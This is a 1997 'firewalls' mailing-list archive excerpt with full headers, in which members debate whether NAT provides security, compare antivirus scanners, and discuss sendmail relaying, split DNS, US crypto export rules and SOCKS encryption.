Which still would have been WRONG, WRONG, WRONG. Not only do they make that statement, but on the same page as that statement (http://www.on.com/ipfunnel/ogipfeat.htm) they have a network diagram that shows the On Guard IP Funnel as the only device between the internal network and the router connecting to the Internet. That's their diagram bud. They don't show any Firewall anywhere in sight. So I see no reason why my message is unfair in any way, shape, or form. As for my comment about Microsoft, I said REJECTED Microsoft marketeers, you know, the ones that Microsoft wouldn't want working there because their too free with their words. This isn't a flame against Microsoft, duh. You got anything intelligent to say on just why you think NAT offers ANY SECURITY AT ALL??? I can't wait to hear it. I mean ANY SECURITY AT ALL. Let me say it again so there's no misunderstanding; TELL ME WHAT SECURITY IP FUNNEL (with the features listed) PROVIDES TO A NETWORK EXPOSED TO THE INTERNET WITH NOTHING ELSE BUT A ROUTER BETWEEN THEIR TRUSTED MACHINES AND THE WILD BLUE YONDER AS SHOWN IN THE IP FUNNEL NETWORK DIAGRAM. Russ R.C. Consulting, Inc. - NT/Internet Security Consulting From firewalls-owner Fri Jan 3 02:28:55 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA09810 for firewalls-outgoing; Fri, 3 Jan 1997 02:15:49 -0800 (PST) Received: from iva.laus.hr ([194.152.247.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id CAA09748 for ; Fri, 3 Jan 1997 02:15:18 -0800 (PST) Received: from sioux.dbk.laus.hr by iva.laus.hr (AIX 3.2/UCB 5.64/4.03) id AA21519; Fri, 3 Jan 1997 11:11:19 +0100 Message-Id: <1.5.4.32.19970103091312.00904024@laus.dbk.laus.hr> X-Sender: mario@laus.dbk.laus.hr X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 03 Jan 1997 11:13:12 +0200 To: firewalls@greatcircle.com From: Mario Misic Subject: sendmail 8.8.4 with firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi ! I am running sendmail-8.8.4 on AIX-3.2.5. My problem is how to configure sendmail-8.8.4 to send mail over my firewall server ! I configure sendmail.cf like they said in README file but .......... ? Thanks. http://www.laus.hr/ M.M From firewalls-owner Fri Jan 3 05:18:30 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA18312 for firewalls-outgoing; Fri, 3 Jan 1997 05:11:02 -0800 (PST) Received: from cat.bbsr.edu (cat.bbsr.edu [198.116.91.161]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA18295 for ; Fri, 3 Jan 1997 05:10:54 -0800 (PST) Message-Id: <199701031310.FAA18295@miles.greatcircle.com> Received: from [198.168.1.45] by cat.bbsr.edu (SMTPD32-3.00) id A4C62DDE002A; Fri Jan 03 09:08:22 1997 From: "Jamie Thain" To: "Russ" , Cc: "'info@on.com'" Subject: Re: NT NAT Date: Fri, 3 Jan 1997 09:06:48 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Russ, >> .Protects your internal IP servers and workstations from Internet hackers Well a NAT is one of the tools. Hey some people put up a single layer "high quality" firewall that offers protection, aka-> network-1, on-guard, firewall/plus and feel they are protected. Most of these vendors make the same claim. And if you had a single connectionless ip port, it would offer alot of protection from getting in... regards:jamie From firewalls-owner Fri Jan 3 05:44:46 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA19598 for firewalls-outgoing; Fri, 3 Jan 1997 05:37:10 -0800 (PST) Received: from ops.wfc.com (ops.wfc.com [199.171.126.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA19588 for ; Fri, 3 Jan 1997 05:37:00 -0800 (PST) Received: from pcmis3.wfc.com by ops.wfc.com with SMTP id AA14759; Fri, 3 Jan 97 07:40:52 -0600 Message-Id: <9701031340.AA14759@ops.wfc.com> Comments: Authenticated sender is From: "Bill DeGan" Organization: Walker Financial Corp. To: firewalls@greatcircle.com Date: Fri, 3 Jan 1997 08:33:11 300 Subject: Virus Scan Software Reply-To: bill2@ops.wfc.com X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Note sure if this is a proper question for this group, but here goes. We are evaluating virus scan software to be installed on individual PC's and would welcome recommendations. We have folks that like Mcfee and Norton but have no solid way to compare. Any help would be appreciated. Bill DeGan Walker Financial Corp. From firewalls-owner Fri Jan 3 06:23:17 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA21294 for firewalls-outgoing; Fri, 3 Jan 1997 06:01:59 -0800 (PST) Received: from boca.dsmith.nai.net (Danbury-Usr2-13.nai.net [208.133.164.70]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA21274 for ; Fri, 3 Jan 1997 06:01:45 -0800 (PST) Received: from boca.dsmith.nai.net (dsmith@localhost [127.0.0.1]) by boca.dsmith.nai.net (8.7.4/8.6.12) with ESMTP id JAA11930 for ; Fri, 3 Jan 1997 09:25:24 -0500 (EST) Message-Id: <199701031425.JAA11930@boca.dsmith.nai.net> X-Mailer: exmh version 1.6.5 12/8/95 From: "David T. Smith" To: Firewalls@greatcircle.com Subject: Re: DNS Proxy and Internal Root Name Server In-reply-to: Your message of "Thu, 02 Jan 1997 16:21:44 PST." <32CC5118.5FB8@csc.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 03 Jan 1997 09:25:21 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message <32CC5118.5FB8@csc.com>, Adam Safier writes: >I'm missing something in this DNS discussion. Don't make the internal >"root" a root, make it your "main" DNS server with a limited cache >file. You set the "main" internal DNS server to act as a recursive >resolver for all internal DNS servers. Here's the problem: BIND does forwarder lookups before doing cache lookups. Therefore, unless the "main" internal DNS server is also a secondary for ALL internal zones, the internal zones will be sent to the external resolver for resolution. With some firewalls, the external resolver be configured as a 'hidden' secondary of the internal top level domain and thus provide recursive resolution. However, that exposes the internal domain to the Internet (albeit only to a knowledgeable invader) and may not be appropriate for some companies. In addition, with firewalls that provide automatic split DNS services, that option may not be available since they would not make the internal network accessible from the external firewall. We are looking at a solution similar to the one posted earlier where the order of resolution is changed in the BIND code: instead of resolution being performed in the order 1) authoritative, 2) forwarded and 3) cached, we believe that it may be useful to perform it in the order 1) authoritative, 2) cached, and 3) forwarded in the case of firewalled environments. David Smith -- //==========================================================\\ ||David T. Smith | Specialists in || ||Tucker Network Technologies | Network Computing || ||50 Washington St., PO 429 | -------------------- || ||South Norwalk, CT 06856 | dsmith@tuckernet.com || \\=========================================================// From firewalls-owner Fri Jan 3 07:49:25 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA26577 for firewalls-outgoing; Fri, 3 Jan 1997 07:22:27 -0800 (PST) Received: from europa.lif.icnet.uk (europa.lif.icnet.uk [143.65.1.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA26556 for ; Fri, 3 Jan 1997 07:21:54 -0800 (PST) From: harley@icrf.icnet.uk Message-Id: <199701031521.HAA26556@miles.greatcircle.com> Received: by europa.lif.icnet.uk; Fri, 3 Jan 1997 15:20:35 GMT Subject: re: Virus Scan Software To: firewalls@greatcircle.com Date: Fri, 3 Jan 1997 15:20:35 +0000 (GMT) X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Note sure if this is a proper question for this group, but here goes. It probably isn't, except in so far as it's always worth reiterating that there's more security mileage in protecting the desktop -at- the desktop than in relying solely on viruswalls and firewalls which attempt to include filtering for viruses. ;-) I'm enclosing some info, and I'm always happy to discuss further by e-mail. > > We are evaluating virus scan software to be installed on individual > PC's and would welcome recommendations. Asking a firewalls list for recommendations in this case is asking your butcher's advice on buying fish. He -may- be well-qualified to advise you: OTOH he may know nothing about fish, he may regard fish as beneath him, and he may feel compelled as a catering professional to pretend he knows more about fish than he really does. B-) Not everyone on this list is a firewalls expert or security guru: those who do fall into one of these categories aren't necessarily up to speed on PCs or viruses. In fact, virus mythology is as rife among security professionals as it is everywhere else. You may get responses that reflect what's in use at sites with representatives here, but that's not the same as recommendations for best practice. > We have folks that like > Mcfee and Norton but have no solid way to compare. As you obviously appreciate, liking the interface of a particular product is a poor basis for virus control. In this area, a nice interface may come a long way behind other criteria such as detection rate, tendency to false alarm, ease of distribution and administration, and other issues of which this isn't the best forum for discussion. McAfee has most of the market share and Symantec/Norton have a great deal of what's left, but neither package is necessarily the highest- rated among professionals. > Any help would be > appreciated. > Some pointers from the alt.comp.virus FAQ are included below. --------------------include--------------------- There used to be a comprehensive set of product reviews at: http://www.first.org/virus/virrevws/ but the page is being reorganized and it may have disappeared altogether. A number of reputable vendors include comparative reviews, papers on testing etc. on their WWW/FTP servers: try http://www.datafellows.com/ http://www.drsolomon.com/ among others. Virus Bulletin comparative reviews are available from http://www.virusbtn.com/Comparatives/ and information is also available on their testing protocols. Product reviews and other kewl stuff from Robert Slade: telnet://freenet.victoria.bc.ca login as guest, give the command "go virus" For a list of scanners that have received the "NCSA Approved" rating of the National Computer Security Association in the U.S.A. see http://www.ncsa.com/avpdcert.html The page also explains the certification procedure. ----------------------outclude-------------------------- NCSA certification for AV products isn't a bad idea in principle, but hasn't always been well-implemented, and is subject to some of the same misgivings voiced here about firewall certification. However, it's probably more use than asking your neighbour what he uses. B-) Secure Computing have an alternative certification scheme in progress, and the January issue includes a 'bumper Anti-Virus review'. (US/Canada subscriptions 100016.2432@compuserve.com). Possibly the best reviews are those done by Virus Bulletin, though. (www.virusbtn.com). You might also like to check out the Virus Research Unit site at Tampere: http://www.uta.fi/laitokset/virus/ The alt.comp.virus FAQ and some other relevant documents (including the Virus-L FAQ) are available from the web page in my signature. -- David Harley \ | / alt.comp.virus FAQ D.Harley@icrf.icnet.uk \ | / & Anti-Virus Web Page Support & Security Analyst \ | / Folk London On-Line gig-list Imperial Cancer Research Fund ____\|/____ http://webworlds.co.uk/dharley/ From firewalls-owner Fri Jan 3 08:01:16 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA26927 for firewalls-outgoing; Fri, 3 Jan 1997 07:32:27 -0800 (PST) Received: from geocities.com (mail2.geocities.com [204.7.246.132]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA26908 for ; Fri, 3 Jan 1997 07:32:10 -0800 (PST) Received: from 193.230.255.2.flex.ro (dial05.flex.ro [193.230.255.105]) by geocities.com (8.7.5/8.7.3) with ESMTP id HAA18320 for ; Fri, 3 Jan 1997 07:31:16 -0800 (PST) Message-Id: <199701031531.HAA18320@geocities.com> Reply-To: From: "Gabriel Dura" To: Subject: Air Force Web Site Hacked - Reply Date: Fri, 3 Jan 1997 17:31:58 +0200 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Read only media might be a solution but it is not a practical one for web sites who change their content very often. I have he following questions related to this subject: - What if the OS is using a RAM disk? - Isn't it possible to start a process who can alter the web file information while it is send (only words for examaple)? I am not a firewall guru but I wonder if it wouldn't be possible to use a second computer as mirror of the Web Site. This computer can supervise the original web site and monitor the audit log using remote access. In case it detects major modifications in the original web site or other kind of unauthorized access it can make the following operations - make a copy of the altered site for later analysis - kill any processes which start writing, or attempting to write in areas they shouldn't (system areas for instance) - save the current system parameters for later analysis - replace the altered site with the good one - change sensitive passwords and save them for the administrator if possible - alert the administrator I think a system like that can prevent hacking without anyone from the outside to observe anything. If the above ideas are not correct please let me know. Just a thought Gabriel Dura dura@geocities.com From firewalls-owner Fri Jan 3 08:13:04 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA27052 for firewalls-outgoing; Fri, 3 Jan 1997 07:37:16 -0800 (PST) Received: from mail.baileynm.com (fw.baileynm.com [206.109.159.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA27037 for ; Fri, 3 Jan 1997 07:36:57 -0800 (PST) Received: (qmail 7360 invoked from smtpd); 3 Jan 1997 15:36:22 -0000 Received: from web.nmti.com (root@198.178.0.201) by fw.nmti.com with SMTP; 3 Jan 1997 15:36:22 -0000 Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id JAA10091; Fri, 3 Jan 1997 09:36:22 -0600 Received: by sonic.nmti.com; id AA13744; Fri, 3 Jan 1997 09:36:16 -0600 From: peter@baileynm.com (Peter da Silva) Message-Id: <9701031536.AA13744@sonic.nmti.com.nmti.com> Subject: Re: The Looong Reach of US Crypto-Export Controls To: relay1.shore.net@shore.net (Vin McLellan) Date: Fri, 3 Jan 1997 09:36:16 -0600 (CST) Cc: firewalls@greatcircle.com In-Reply-To: from "Vin McLellan" at Jan 3, 97 03:22:17 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Yow! > c.3. ``Software'' designed or modified to protect against malicious > computer damage, e.g., viruses; Technically this means that a copy of "login" that uses a plaintext password file with no encryption qualifies as a munition, because the purpose of access control is to protect against malicious computer damage. This makes Windows NT and any version of UNIX illegal to export as well, because both have access control and multiuser protection built in. > a. ``Software'' required'' for the ``use'' of equipment excluded > from control under the Note to 5A002. You can always run Windows 3.1 on your laptop, right? Or if this isn't enough, embed the encryption as an inherent part of the O/S and bypass ITAR completely. > b. ``Software'' providing any of the functions of equipment > excluded from control under the Note to 5A002. What equipment is this? From firewalls-owner Fri Jan 3 08:50:16 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA29049 for firewalls-outgoing; Fri, 3 Jan 1997 08:26:31 -0800 (PST) Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA29036 for ; Fri, 3 Jan 1997 08:25:55 -0800 (PST) Message-Id: <199701031625.IAA29036@miles.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 4230; Fri, 03 Jan 97 11:25:06 EST Date: Fri, 03 Jan 1997 11:24:28 EST From: "John Silltow, Sys Security (GBWBSDHS) X5095 SILLTOJ - WEBS" To: firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: RE: VIRUS SCAN SOFTWARE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Responding to Bill DeGan: Although the type and frequency of viruses can be different in countries around the world, in the UK we have a publication called Virus Bulletin which regularly reviews virus scanners and does comparisons. In addition, the magazine Secure Computing has just undertaken a comparative review. In general, the 100 per cent hit rates are achieved by Dr. Solomons, Data Fellows F-Prot and Command F-Prot. Sophos Sweep, Thunderbytes and McAfee tend to come in around 99 per cent. We use a 'sheepdip' machine with Dr. Solomon's and Sophos on it for all diskettes coming into the organisation. Once checked the diskettes are given an authorisation code by Disknet. Individual machines have Dr. Solomon's running as a scanner and in memory. Gradually they are all getting the Disknet software as well and at that time they are unable to accept a diskette which has not been through the the authorisation process (i.e. scanned). The individual machines are also set up so that they cannot originally authenticate any diskette unless they conduct a low-level format on it first. This slows down software and data theft as a bonus. Hope this helps. Come back to me if you need more. John Silltow gbwbsdhs@ibmmail.com From: "Bill DeGan" To: firewalls@greatcircle.com Date: Fri, 3 Jan 1997 08:33:11 300 Subject: Virus Scan Software Note sure if this is a proper question for this group, but here goes. We are evaluating virus scan software to be installed on individual PC's and would welcome recommendations. We have folks that like Mcfee and Norton but have no solid way to compare. Any help would be appreciated. Bill DeGan Walker Financial Corp. From firewalls-owner Fri Jan 3 09:37:03 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA29761 for firewalls-outgoing; Fri, 3 Jan 1997 08:44:21 -0800 (PST) Received: from mail.swip.net (mail.swip.net [192.71.180.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA29728 for ; Fri, 3 Jan 1997 08:44:01 -0800 (PST) Received: from wintermute.marievik.findata.se by mail.swip.net (8.6.8/3.01) id RAA11070; Fri, 3 Jan 1997 17:43:11 +0100 Received: from wintermute.marievik.findata.se (ckn@wintermute.marievik.findata.se [192.71.39.5]) by wintermute.marievik.findata.se (8.6.4/8.6.4) with SMTP id RAA11306 for ; Fri, 3 Jan 1997 17:43:10 +0100 Date: Fri, 3 Jan 1997 17:43:09 +0100 (MET) From: Carl Karlsson X-Sender: ckn@wintermute.marievik.findata.se To: "'Firewalls Mailing List'" Subject: RE: NT NAT In-Reply-To: <41FDA823FC5AD011A0970000E8D5C66771A6@mail.rc.on.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 3 Jan 1997, Russ wrote: > You got anything intelligent to say on just why you think NAT offers ANY > SECURITY AT ALL??? I can't wait to hear it. I mean ANY SECURITY AT ALL. I'd like to know if and why this means that masquerading one's network behind a 'secured' host doesn't provide any added security from just connecting the network straight out? Or am I missing something here (not unusual :)? I was under the impression that if I use some box (Linux with TIS fwtk for example, or that NT box perhaps?) masquerading my network and using 192.168.x.x-addresses inside, I would be at least a little bit more secure than if had all my w95/nt/unix machines directly connected to the internet? (Not talking super-secure here, not flaming anyone, but just interested! Pointers do nicely if this is already well-known...) Calle From firewalls-owner Fri Jan 3 10:07:58 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA00295 for firewalls-outgoing; Fri, 3 Jan 1997 08:51:35 -0800 (PST) Received: from exp2.is.xpark.pmh.org (exphub.is.xpark.pmh.org [198.215.78.104]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA00221 for ; Fri, 3 Jan 1997 08:50:56 -0800 (PST) Received: from localhost by exp2.is.xpark.pmh.org (AIX 3.2/UCB 5.64/4.03) id AA38776; Fri, 3 Jan 1997 10:42:43 -0600 Message-Id: <32CD3702.58E@exphub.pmh.org> Date: Fri, 03 Jan 1997 10:42:42 -0600 From: "Cary Conover(IS) 13897" Organization: Parkland Memorial Hospital X-Mailer: Mozilla 3.01Gold (X11; I; AIX 2) Mime-Version: 1.0 To: Mario Misic Cc: firewalls@greatcircle.com Subject: Re: sendmail 8.8.4 with firewall References: <1.5.4.32.19970103091312.00904024@laus.dbk.laus.hr> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mario Misic wrote: > > Hi ! > > I am running sendmail-8.8.4 on AIX-3.2.5. > > My problem is how to configure sendmail-8.8.4 to send mail over my firewall > server ! > I configure sendmail.cf like they said in README file but .......... ? > > Thanks. > > http://www.laus.hr/ > > M.M You need to get with the network administrator and find out which one of your network servers is the Mail Handler and if it is noted as such in the DNS. If it is then the sendmail should use this to send the mail to the firewall first and then the firewall forwards it on to the outside world. I would assume that the Firewall would be listed as an MX in the DNS as well. I am not sure on this one. I know I will get corrected if I am wrong. -- Cary D. Conover AIX Systems Administrator Senior Systems Analyst Parkland Memorial Hospital Dallas, Texas cconov@parknet.pmh.org carydc@why.net 817-571-6694 Home Voice 817-571-6793 Data/Fax 817-360-8572 Mobile 214-590-0244 Work Voice 214-786-0282 Pager From firewalls-owner Fri Jan 3 10:13:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA00517 for firewalls-outgoing; Fri, 3 Jan 1997 08:57:17 -0800 (PST) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA00507 for ; Fri, 3 Jan 1997 08:57:04 -0800 (PST) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id IAA28727 for ; Fri, 3 Jan 1997 08:58:42 -0800 (PST) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA09111; Fri, 3 Jan 97 08:55:58 PST Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id IAA07294 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Fri, 3 Jan 1997 08:55:31 -0800 (PST) Message-Id: <199701031655.IAA07294@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id ED12BEAB05141A6E88256414005C8705; Fri, 3 Jan 97 08:55:29 EDT To: Lawrence Ting Cc: firewalls From: Ryan Russell/SYBASE Date: 3 Jan 97 8:52:36 EDT Subject: Re: Any Recommendations? X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Firewall-1 will proxy when it needs to authenticate users going out (i.e. pop up a web page asking for username and password before it lets you out.) But, as a general purpose proxy (logging URLs, filtering content, caching, etc..) I believe it would make a poor choice. I don't nkow this from personal experience, having only used it in the stateful-packet-filter mode, but from the docs I've looked at, I don't think I'm incorrect. Ryan ---------- Previous Message ---------- To: firewalls cc: From: lawrenceting @ www.uob.com.sg (Lawrence Ting) @ smtp Date: 01/03/97 01:29:59 PM Subject: Any Recommendations? Good day, I'm in the midst of evaluating BlackHole, Gauntlet and Firewall-1 as a proxy-based firewall, while evaluating Sunscreen, CISCO PIX and Proteon GTX Secure as a IP-less packet-filtering firewall. Firewall-1 seemed more like a packet-filtering firewall while I have a hard time to distinguish a better choice between Blackhole and Gauntlet. As for Suncreen, it is a definite more expensive choice than the other two. Can someone pls do kindly share your expertise or comments or experience on the abv mentioned products in terms of their functionalities? Thanks in adv. Lawrence TING Network Security Officer From firewalls-owner Fri Jan 3 10:50:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA08214 for firewalls-outgoing; Fri, 3 Jan 1997 10:01:16 -0800 (PST) Received: from garcon.unicom.com (garcon.unicom.com [192.108.105.37]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id KAA08192 for ; Fri, 3 Jan 1997 10:01:01 -0800 (PST) Received: (from chip@localhost) by garcon.unicom.com (8.6.12/8.6.12) id MAA24783; Fri, 3 Jan 1997 12:03:19 -0600 (CST) From: Chip Rosenthal Message-Id: <199701031803.MAA24783@garcon.unicom.com> Subject: Re: internal filtering router - filter config? To: Firewalls@GreatCircle.COM Date: Fri, 3 Jan 1997 12:03:19 -0600 (CST) Cc: makoski@future.dreamscape.com In-Reply-To: <199701030900.BAA03967@miles.greatcircle.com> from "Firewalls-Digest" at Jan 03, 1997 01:00:39 AM X-Mailer: ELM [version 2.5 PL0a10] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: Steve Matkoski > Subject: internal filtering router - filter config? > > What type of things would you filter on the internal router? or even > the external router? I am going to be installing a firewall real soon > and would really appreciate any help. Unless I misunderstand, I think you ought to be asking what should be *allowed* rather than what should be filtered. Most people here would advocate a "deny unless specifically permitted" stance in your filter rules. If you don't already have a firewall book, the Chapman & Zwicky book does a pretty good job on this stuff. They give a lot of attention to configuring the filter on a service-by-service basis. -- Chip Rosenthal * Unicom Systems Development * URL: http://www.unicom.com/ * 4868D8BE10C86BDE 6017000BA783998E Helmet good. Law bad. From firewalls-owner Fri Jan 3 10:56:22 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA09308 for firewalls-outgoing; Fri, 3 Jan 1997 10:13:01 -0800 (PST) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id KAA09274 for ; Fri, 3 Jan 1997 10:12:40 -0800 (PST) Received: by hidata.com; id AA13745; Fri, 3 Jan 97 10:12:12 PST Received: from oscntsrv.hidata.com(205.158.60.100) by hds-gw.hidata.com via smap (3.2) id xma013732; Fri, 3 Jan 97 10:11:46 -0800 Received: by oscntsrv.hidata.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF95F.796A2770@oscntsrv.hidata.com>; Fri, 3 Jan 1997 10:18:33 -0800 Message-Id: From: "Stout, Bill" To: "'Firewall List'" Subject: RE: The Looong Reach of US Crypto-Export Controls Date: Fri, 3 Jan 1997 10:18:32 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Friday, January 03, 1997 12:22 AM, Vin McLellan[SMTP:relay1.shore.net@shore.net] wrote: > I earlier posted a message which quoted a well-informed Netizen who > claimed that the new US Federal ERA regs (which transfer control of many > encryption exports from the U.S. Dept. of State to the U.S. Commerce Dept) > now explicitly forbid the unlicensed export of software "designed or > modified to protect against malicious computer damage, e.g., viruses" > (c.3., below) > > Tell the truth, I couldn't quite believe they had done it! (A > whole new _class_ of export controls? Over very basic computer security > tech, so vaguely described? Tucked into into the fine print of a > regulatory rewrite which the Administration has widely touted as a > "compromise" with market-hungry US Industry and concerned compsec > professionals!?! And with the DC rumor mill full of claims that the > heavy-handed ERA language reflected the FBI's ambitions for a domestic GAK > bill, not the NSA/DoD's spooky Infowar concerns.) In an infowar environment, where Army Generals state they worry about 'Getting their butts kicked by long-haired hackers' (Not exact quote), creating and sending computer viruses to disable a countries' PCs, Servers, Routers, and other equipment is an important attack, (against either state or industrial targets) and most useful these days in a U.S. defined non-'real' war LIC (Low Intensity Conflict) such as Honduras (anyone remember?), Ethiopia, Bosnia, and against a U.S. Domestic group involved in an activity the Feds have proclaimed todays' Politically correct 'War' on (Drugs/Guns/Bombs/Encryption/ Domestic Violence/Wire fraud/[insert propaganda campain here]). Any effort to innoculate foreign equipment would make infowar that much more difficult. Creating a trojaned virus that internally launched SYN, POD (ping of death), boot sector corruption, and other system disabling or moral degrading event is much more cost effective than launching one or more Multi-million dollar cruise missle per telephone closet. Plus you can't just launch cruise missles during a LIC, plus the U.S. usually ends up paying to rebuild what they blow up. Rumours in the past accused our government of accidental release of biological viruses to the public, and feds are now reviewing previously denied friendly troop exposure to Iraqi NBC (Nuclear/Biological/Chemical) weapons and defoliant 'Agent orange' used in the Vietnam LIC. In order to prevent becoming a bystander casualty in some infowar action which is either announced on CNN or not, we need to do our best to protect our own systems against not just lamer and elite hackers who rarely do intentional damage, but against friendly accidents, direct state attacks, mercenary (paid malicious hackers), and violent activist groups (ACT-UP, Environmental, Marxist, Anti-Abortionists, Nazi, Radical Militia, the ATF/FBI/IRS-Secret Service, etc). Sorry for the verbosity. Bill From firewalls-owner Fri Jan 3 10:56:35 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA02520 for firewalls-outgoing; Fri, 3 Jan 1997 09:22:14 -0800 (PST) Received: from newman (newman.aventail.com [38.225.141.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA02500 for ; Fri, 3 Jan 1997 09:21:59 -0800 (PST) Received: from kramer.in.aventail.com.aventail.com (root@newman [192.168.1.1]) by newman (8.6.12/8.6.9) with SMTP id JAA21665; Fri, 3 Jan 1997 09:20:31 -0800 Date: Fri, 3 Jan 1997 09:20:31 -0800 Message-Id: <199701031720.JAA21665@newman> From: "William M. Perry" To: Denis Vella cc: firewalls@greatcircle.com Subject: Re: Securing a LAN Reply-to: wmperry@aventail.com X-Face: O~Rn;(l][/-o1sALg4A@xpE:9-"'IR[%;,,!m7I'm not sure if this is the right place for this question..... Does anyone >have any info on how to secure traffic ( maybe encrypt ) between, say, a >Windows Client and a Unix Server over an internal LAN while maintaining >compatibility with existing applications? This is definitely the right place to ask. You can currently do this with a SOCKS server and an auto-socksifier like AutoSOCKS [1] or SocksCap [2] for windows. I'll concentrate on AutoSOCKS because I know it better (of course). AutoSOCKS & SocksCap both automatically socksify an existing application. With AutoSOCKS, you run it once at login, and it socksifies any application from then onward. With SocksCap, you launch each application through it - same effect, just less transparent to the user. With SOCKS v5, you can strongly authenticate or encrypt using a variety of methods. If you are using the aventail products, you have a few more choices. With publicly available code from NEC you can use Username/Password authentication, and control on a per-user basis who gets access to what. For server-to-server communication, you can use Kerberos via the GSS API - currently this is not available on the windows client side though. We have plugins for different authentication/encryption mechanisms as well, including CHAP to avoid sending your password in the clear on each connection, and the upcoming VPN server beta will support SSL. You can find the specifications for CHAP and (soon) SSL in your nearest internet-drafts repository (look for *marcvh*), or on the aventail web site [3]. -Bill P. 1 - http://www.aventail.com/ 2 - http://www.socks.nec.com/ 3 - http://www.aventail.com/educate/security.html From firewalls-owner Fri Jan 3 12:02:39 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA15602 for firewalls-outgoing; Fri, 3 Jan 1997 11:00:23 -0800 (PST) Received: from loach.cichlid.com (loach.cichlid.com [165.227.20.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA15391 for ; Fri, 3 Jan 1997 10:59:23 -0800 (PST) Received: (from news@localhost) by loach.cichlid.com (8.7.4/8.7.3) id KAA15825; Fri, 3 Jan 1997 